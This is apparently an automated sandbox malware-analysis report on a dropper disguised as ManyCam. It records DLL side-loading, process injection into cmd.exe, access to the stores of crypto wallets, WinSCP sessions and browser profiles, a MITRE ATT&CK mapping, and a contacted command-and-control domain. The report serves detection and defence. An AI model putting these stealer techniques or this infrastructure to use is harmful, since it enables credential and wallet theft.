Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FFE221E4B5E
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtCreateFile: Direct from: 0x7FF66098A345	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DB68379B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF660991DC3
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF66085B177
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtReadFile: Direct from: 0x7FF6DB59B270	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtSetInformationProcess: Direct from: 0x7FF6DB5A1B38	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryValueKey: Direct from: 0x7FF66087C96A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryInformationProcess: Direct from: 0x7FF66086105B
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQuerySystemInformation: Direct from: 0x7FF6608AA16D
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF6DB58EF22	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQuerySystemInformation: Direct from: 0x7FF6608D60DF
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQuerySystemInformation: Direct from: 0x7FF6DB6847FC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtSetInformationProcess: Direct from: 0x7FF6DB5A0828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF6DB6D34AE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtOpenKeyEx: Direct from: 0x7FF66087C1FC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	NtSetInformationThread: Direct from: 0x6D51245D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryInformationToken: Direct from: 0x7FF6608787C9
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtCreateFile: Direct from: 0x7FF660987AD9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DB59B177	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6608ADDFD
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtCreateThreadEx: Direct from: 0x7FF6607B51E6
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtClose: Direct from: 0x7FF6DB6CC8CB
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtRequestWaitReplyPort: Direct from: 0x7FF6DB594869	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryValueKey: Direct from: 0x7FF6DB5BCED4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DB5E90E8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtReadFile: Direct from: 0x14011D832	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQuerySystemInformation: Direct from: 0x7FF6DB5EA16D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF6DB6D3586	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF66084EF22
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtCreateFile: Direct from: 0x14011D7A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtReadFile: Direct from: 0x7FF66085B270	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtSetInformationProcess: Direct from: 0x7FF660860828
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtCreateFile: Direct from: 0x7FF66085AF91	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF6DB6CB236	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF6DB58F3D9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryInformationProcess: Direct from: 0x7FF6DB5A105B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF6DB6865FD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtClose: Direct from: 0x7FF6DB6CC8D9
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtSetInformationProcess: Direct from: 0x7FF660861B38
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF66098B664
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF66085F625
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryInformationToken: Direct from: 0x7FF6DB5E68DA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtReadVirtualMemory: Direct from: 0x7FF66098778C
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x140120A3C
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQuerySystemInformation: Direct from: 0x7FF66084EB16
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtClose: Direct from: 0x7FF6DB5A12A8

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe base: 2E5010	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe base: 365010	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6D23F0 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,swprintf,GetLastError,GetLastError,GetTickCount,swprintf,GetLastError,GetModuleFileNameW,swprintf,CreateFileMappingW,GetCommandLineW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,swprintf,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,

0_2_00007FF6EF6D23F0

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\local\temp\rarsfx0\manycam.exe"
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\eh_monitor_test\manycam.exe"
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\eh_monitor_test\manycam.exe"
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\eh_monitor_test\manycam.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\local\temp\rarsfx0\manycam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\eh_monitor_test\manycam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\eh_monitor_test\manycam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\eh_monitor_test\manycam.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6D15BC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,CopySid,SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,

0_2_00007FF6EF6D15BC

Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6C4E78 cpuid

0_2_00007FF6EF6C4E78

Source: C:\Users\user\Desktop\file.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00007FF6EF6D18DC

Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6D5334 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,

0_2_00007FF6EF6D5334

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6BE84C GetVersionExW,

0_2_00007FF6EF6BE84C

Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	11 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Masquerading	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	212 Process Injection	11 Virtualization/Sandbox Evasion	1 Credentials in Registry	221 Security Software Discovery	Remote Desktop Protocol	11 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	212 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Abuse Elevation Control Mechanism	LSA Secrets	13 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	146 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	18%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\RarSFX0\CrashRpt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\RarSFX0\cv099.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\RarSFX0\cxcore099.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\RarSFX0\cximagecrt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\RarSFX0\highgui099.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\EH_Monitor_test\CrashRpt.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\EH_Monitor_test\cv099.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\EH_Monitor_test\cxcore099.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\EH_Monitor_test\cximagecrt.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\EH_Monitor_test\highgui099.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.symauth.com/cps0(	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
http://www.symauth.com/rpa00	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nocaryesmoto1.website	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://nocaryesmoto1.website/Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.manycam.com/codec	ManyCam.exe, ManyCam.exe, 00000003.00000000.1714817804.00000000005A4000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2147384434.00000000005A4000.00000002.00000001.01000000.00000011.sdmp	false		unknown
https://nocaryesmoto1.website/aCw	Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website/TrueCCU	Rzu_channel_debug.exe, 0000000B.00000003.2370328312.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.vmware.com/0	ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website/U	Rzu_channel_debug.exe, 0000000B.00000002.2370571330.0000000000436000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History	cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.softwareok.com/?Freeware/Find.Same.Images.OK	cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website/Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT	Rzu_channel_debug.exe, 0000000B.00000003.2370328312.0000000000454000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000474000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website/True	Rzu_channel_debug.exe, 0000000B.00000003.2370328312.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://download.manycam.com/effects/%s/%s?v=%sBackgroundsDynamicDynamic	file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp	false		unknown
https://nocaryesmoto1.website/Scoreboard-10-2.htmltaPM	Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website:443	Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.softwareok.de/?Freeware/Find.Same.Images.OK	cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website/dcigkldape	Rzu_channel_debug.exe, 0000000B.00000003.2270513933.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283066654.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://nocaryesmoto1.website:443s_z	Rzu_channel_debug.exe, 0000000B.00000003.2283066654.0000000000485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0	cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.softwareok.de	ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000000.2000003324.00000001401E0000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History	cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.softwareok.com/?Download=Find.Same.Images.OK	cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://manycam.com/feedback/?version=%s	ManyCam.exe	false		unknown
